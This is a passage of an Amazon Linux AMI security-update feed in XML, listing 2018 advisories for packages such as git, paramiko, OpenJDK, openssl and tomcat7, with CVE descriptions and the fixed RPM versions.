author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1092</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1092: important priority package update for gitolite3</title><issued date="2018-10-17 22:01:00" /><updated date="2018-10-18 22:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16976:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16976" title="" id="CVE-2018-16976" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gitolite3" version="3.6.9" release="1.1.amzn1" epoch="1" arch="noarch"><filename>Packages/gitolite3-3.6.9-1.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1093</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1093: important priority package update for git</title><issued date="2018-10-17 22:02:00" /><updated date="2018-10-18 22:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-17456:
Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive &quot;git clone&quot; of a superproject if a .gitmodules file has a URL field beginning with a &#039;-&#039; character.
1636619:
CVE-2018-17456 git: arbitrary code execution via .gitmodules
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17456" title="" id="CVE-2018-17456" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-p4" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.5-1.59.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.5-1.59.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.5-1.59.amzn1.i686.rpm</filename></package><package name="git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.5-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1094</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1094: medium priority package update for 389-ds-base</title><issued date="2018-10-23 18:40:00" /><updated date="2018-10-23 23:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14638:
A double-free of a password policy structure was found in the way slapd was handling certain errors during persistent search. A unauthenticated attacker could use this flaw to crash Directory Server.
1626079:
CVE-2018-14638 389-ds-base: Crash in delete_passwdPolicy when persistent search connections are terminated unexpectedly
CVE-2018-14624:
A vulnerability was discovered in 389-ds-base. The lock controlling the error log was not correctly used when re-opening the log file in log__error_emergency(). An attacker could send a flood of modifications to a very large DN, which would cause slapd to crash.
1619450:
CVE-2018-14624 389-ds-base: Server crash through modify command with large DN
CVE-2018-10935:
A flaw was found in the 389 Directory Server that allows users to cause a crash in the LDAP server using ldapsearch with server side sort.
1613606:
CVE-2018-10935 389-ds-base: ldapsearch with server side sort allows users to cause a crash
CVE-2018-10850:
A race condition was found in the way 389-ds-base handles persistent search, resulting in a crash if the server is under load. An anonymous attacker could use this flaw to trigger a denial of service.
1588056:
CVE-2018-10850 389-ds-base: race condition on reference counter leads to DoS using persistent search
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10850" title="" id="CVE-2018-10850" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10935" title="" id="CVE-2018-10935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14624" title="" id="CVE-2018-14624" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14638" title="" id="CVE-2018-14638" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.7.5-28.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1095</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1095: medium priority package update for nss</title><issued date="2018-10-23 18:41:00" /><updated date="2018-10-23 23:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12384:
A flaw was found in the way NSS responded to an SSLv2-compatible ClientHello with a ServerHello that had an all-zero random. A man-in-the-middle attacker could use this flaw in a passive replay attack.
1622089:
CVE-2018-12384 nss: ServerHello.random is all zeros when handling a v2-compatible ClientHello
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12384" title="" id="CVE-2018-12384" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.36.0-5.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1096</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1096: critical priority package update for python-paramiko</title><issued date="2018-10-23 18:43:00" /><updated date="2018-10-23 23:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000805:
Paramiko version 2.4.1, 2.3.2, 2.2.3, 2.1.5, 2.0.8, 1.18.5, 1.17.6 contains a Incorrect Access Control vulnerability in SSH server that can result in RCE. This attack appear to be exploitable via network connectivity.
1637263:
CVE-2018-1000805 python-paramiko: Authentication bypass in auth_handler.py
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000805" title="" id="CVE-2018-1000805" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-paramiko" version="1.15.1" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-paramiko-1.15.1-2.7.amzn1.noarch.rpm</filename></package><package name="python26-paramiko" version="1.15.1" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-paramiko-1.15.1-2.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1097</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1097: critical priority package update for java-1.8.0-openjdk</title><issued date="2018-11-05 19:33:00" /><updated date="2018-11-08 00:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3214:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Sound). Supported versions that are affected are Java SE: 6u201, 7u191 and 8u182; Java SE Embedded: 8u181; JRockit: R28.3.19. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1639301:
CVE-2018-3214 OpenJDK: Infinite loop in RIFF format reader (Sound, 8205361)
CVE-2018-3183:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Scripting). Supported versions that are affected are Java SE: 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. While the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).
1639268:
CVE-2018-3183 OpenJDK: Unrestricted access to scripting engine (Scripting, 8202936)
CVE-2018-3180:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JSSE). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via SSL/TLS to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded, JRockit accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded, JRockit accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L).
1639484:
CVE-2018-3180 OpenJDK: Missing endpoint identification algorithm check during TLS session resumption (JSSE, 8202613)
CVE-2018-3169:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639293:
CVE-2018-3169 OpenJDK: Improper field access checks (Hotspot, 8199226)
CVE-2018-3149:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639834:
CVE-2018-3149 OpenJDK: Incomplete enforcement of the trustURLCodebase restriction (JNDI, 8199177)
CVE-2018-3139:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1639442:
CVE-2018-3139 OpenJDK: Leak of sensitive header data via HTTP redirect (Networking, 8196902)
CVE-2018-3136:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.4 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N).
1639755:
CVE-2018-3136 OpenJDK: Incorrect handling of unsigned attributes in signed Jar manifests (Security, 8194534)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3136" title="" id="CVE-2018-3136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3139" title="" id="CVE-2018-3139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3149" title="" id="CVE-2018-3149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3169" title="" id="CVE-2018-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3180" title="" id="CVE-2018-3180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3183" title="" id="CVE-2018-3183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3214" title="" id="CVE-2018-3214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-demo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.191.b12-0.42.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.191.b12-0.42.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.191.b12-0.42.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.191.b12" release="0.42.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.191.b12-0.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1098</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1098: medium priority package update for openssl</title><issued date="2018-10-30 20:50:00" /><updated date="2018-11-01 23:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0732:
During key agreement in a TLS handshake using a DH(E) based ciphersuite a malicious server can send a very large prime value to the client. This will cause the client to spend an unreasonably long period of time generating a key for this prime resulting in a hang until the client has finished. This could be exploited in a Denial Of Service attack. Fixed in OpenSSL 1.1.0i-dev (Affected 1.1.0-1.1.0h). Fixed in OpenSSL 1.0.2p-dev (Affected 1.0.2-1.0.2o).
1591100:
CVE-2018-0732 openssl: Malicious server can send large prime to client during DH(E) TLS handshake causing the client to hang
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0732" title="" id="CVE-2018-0732" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-13.111.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-13.111.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="13.111.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-13.111.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1099</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1099: medium priority package update for tomcat7</title><issued date="2018-11-05 19:35:00" /><updated date="2018-11-08 00:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11784:
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to &#039;/foo/&#039; when the user requested &#039;/foo&#039;) a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.
1636512:
CVE-2018-11784 tomcat: Open redirect in default servlet
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11784" title="" id="CVE-2018-11784" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.91" release="1.34.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.91-1.34.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.91" release="1.34.amzn1" 